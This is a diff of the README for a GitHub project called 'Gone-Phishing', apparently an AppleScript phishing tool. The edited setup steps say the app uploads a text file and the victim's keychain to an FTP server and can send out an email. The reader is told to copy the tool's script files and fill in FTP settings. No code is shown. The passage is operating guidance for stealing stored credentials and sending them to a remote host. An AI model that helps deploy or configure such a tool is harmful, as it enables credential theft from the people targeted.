benb116/Gone-Phishing/Readme.md

 ###Please feel free to test the script by doing the following:

-If you don't want your app to upload the text file and the keychain to an FTP server, you can just download "[Ready To Use App](https://github.com/benb116/Gone-Phishing/blob/master/Ready%20To%20Use%20App.zip)" and unzip it.
+If you don't want your app to upload the text file and the keychain to an FTP server, and you don't want to actually send the email, you can just download "[Ready To Use App](https://github.com/benb116/Gone-Phishing/blob/master/Ready%20To%20Use%20App.zip)" and unzip it.

-If you do want an FTP server, follow the steps below.
+If you do want to upload to an FTP server and/or send out the email, follow the steps below.

 1. Copy "App.applescript", "Updater.applescript", "DK.applescript", and "icon.icns" to your computer.
 2. Open 'App.applescript' and 'Updater.applescript' in AppleScript Editor and find the FTP command properties.